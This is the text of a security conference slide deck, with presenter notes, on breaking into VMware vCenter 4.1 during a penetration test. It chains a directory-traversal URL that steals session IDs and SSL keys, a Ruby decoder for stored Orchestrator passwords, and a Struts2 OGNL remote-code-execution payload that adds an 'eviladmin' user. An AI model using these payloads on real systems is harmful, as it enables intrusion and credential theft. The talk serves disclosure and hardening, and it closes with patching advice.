Upload File

invest in security

32
Invest in security to secure investments How to hack VMware vCenter server in 60 seconds Alexey Sintsov, Alexander Minozhenko

Upload: others

Post on 27-Apr-2022

1 views

Category:

Documents


0 download

Report

TRANSCRIPT

Page 1: Invest in security

Invest in security to secure investments

How to hack VMware vCenter server in 60 seconds Alexey Sintsov Alexander Minozhenko

Presenter
Presentation Notes
Hello everyone My name is Alexander Minozhenko This talk is planned with Alexey Sintsov but unfortunately he could not attend because of problem with travel documents13This talk will discuss some ways to gain control over the virtual infrastructure through vCenterrsquos services 13I will describe a few non-dangerous bugs (they were 0-days when we found them) but if we can use all of them together we will get administrative access to vCenter which means to the whole virtual network It not a rocket science 13

whoami

bull Pen-tester at ERPscan Company

bull Researcher

bull DCG7812

bull CTF

Presenter
Presentation Notes
I am work at company ERPScan as penetration tester13I am one of defcon-russia DCG7812 organizer13Also I sometimes play at CTF competions with team leet more 13

ERPScan

bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of

companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for

SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review

Presenter
Presentation Notes
My company ERPScan is part of Digital Security company We perform security audit penetration testing security assessment of erp system 13

Target

Presenter
Presentation Notes
During one of our penetration testing we found network where a part of infrastructure was built on Vmware ESXi servers with Vmware vCenter All hosts was patched up13 It is hard to directly attack Vmware ESXi server 13

Target

Presenter
Presentation Notes
We decided that much better approach would be attack VMware Infastructure management solution So out target vCenter version 41 update 113

VMware vCenter Server

bull VMware vCenter Server is solution to manage VMware vSphere

Presenter
Presentation Notes
Vmware vCenter is solution for management and configuration vShpere 13Containts a lot of services like VMware Update manager ndashsolution for path mangment vCenter Orchestrator ChargeBack Manager and others Each of services contains http and other ports 13

CVE-2009-1523

bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (

Presenter
Presentation Notes
First thing we do is check exploit-db security mail list to find some vulns13There are not a lot of bugs at vCenter 13First we saw classical directory traversal discovered by Claudio Criscione in VMware Update Manager The vulnerability was caused by Jetty web server which is bind on port 9084 The cause of bug was in alias handling on windows We can read any file by exploiting this bug 13But unfortunaly this bug was fixed in our version So we could not use it

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 2: Invest in security

whoami

bull Pen-tester at ERPscan Company

bull Researcher

bull DCG7812

bull CTF

Presenter
Presentation Notes
I am work at company ERPScan as penetration tester13I am one of defcon-russia DCG7812 organizer13Also I sometimes play at CTF competions with team leet more 13

ERPScan

bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of

companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for

SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review

Presenter
Presentation Notes
My company ERPScan is part of Digital Security company We perform security audit penetration testing security assessment of erp system 13

Target

Presenter
Presentation Notes
During one of our penetration testing we found network where a part of infrastructure was built on Vmware ESXi servers with Vmware vCenter All hosts was patched up13 It is hard to directly attack Vmware ESXi server 13

Target

Presenter
Presentation Notes
We decided that much better approach would be attack VMware Infastructure management solution So out target vCenter version 41 update 113

VMware vCenter Server

bull VMware vCenter Server is solution to manage VMware vSphere

Presenter
Presentation Notes
Vmware vCenter is solution for management and configuration vShpere 13Containts a lot of services like VMware Update manager ndashsolution for path mangment vCenter Orchestrator ChargeBack Manager and others Each of services contains http and other ports 13

CVE-2009-1523

bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (

Presenter
Presentation Notes
First thing we do is check exploit-db security mail list to find some vulns13There are not a lot of bugs at vCenter 13First we saw classical directory traversal discovered by Claudio Criscione in VMware Update Manager The vulnerability was caused by Jetty web server which is bind on port 9084 The cause of bug was in alias handling on windows We can read any file by exploiting this bug 13But unfortunaly this bug was fixed in our version So we could not use it

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 3: Invest in security

ERPScan

bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of

companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for

SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review

Presenter
Presentation Notes
My company ERPScan is part of Digital Security company We perform security audit penetration testing security assessment of erp system 13

Target

Presenter
Presentation Notes
During one of our penetration testing we found network where a part of infrastructure was built on Vmware ESXi servers with Vmware vCenter All hosts was patched up13 It is hard to directly attack Vmware ESXi server 13

Target

Presenter
Presentation Notes
We decided that much better approach would be attack VMware Infastructure management solution So out target vCenter version 41 update 113

VMware vCenter Server

bull VMware vCenter Server is solution to manage VMware vSphere

Presenter
Presentation Notes
Vmware vCenter is solution for management and configuration vShpere 13Containts a lot of services like VMware Update manager ndashsolution for path mangment vCenter Orchestrator ChargeBack Manager and others Each of services contains http and other ports 13

CVE-2009-1523

bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (

Presenter
Presentation Notes
First thing we do is check exploit-db security mail list to find some vulns13There are not a lot of bugs at vCenter 13First we saw classical directory traversal discovered by Claudio Criscione in VMware Update Manager The vulnerability was caused by Jetty web server which is bind on port 9084 The cause of bug was in alias handling on windows We can read any file by exploiting this bug 13But unfortunaly this bug was fixed in our version So we could not use it

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 4: Invest in security

Target

Presenter
Presentation Notes
During one of our penetration testing we found network where a part of infrastructure was built on Vmware ESXi servers with Vmware vCenter All hosts was patched up13 It is hard to directly attack Vmware ESXi server 13

Target

Presenter
Presentation Notes
We decided that much better approach would be attack VMware Infastructure management solution So out target vCenter version 41 update 113

VMware vCenter Server

bull VMware vCenter Server is solution to manage VMware vSphere

Presenter
Presentation Notes
Vmware vCenter is solution for management and configuration vShpere 13Containts a lot of services like VMware Update manager ndashsolution for path mangment vCenter Orchestrator ChargeBack Manager and others Each of services contains http and other ports 13

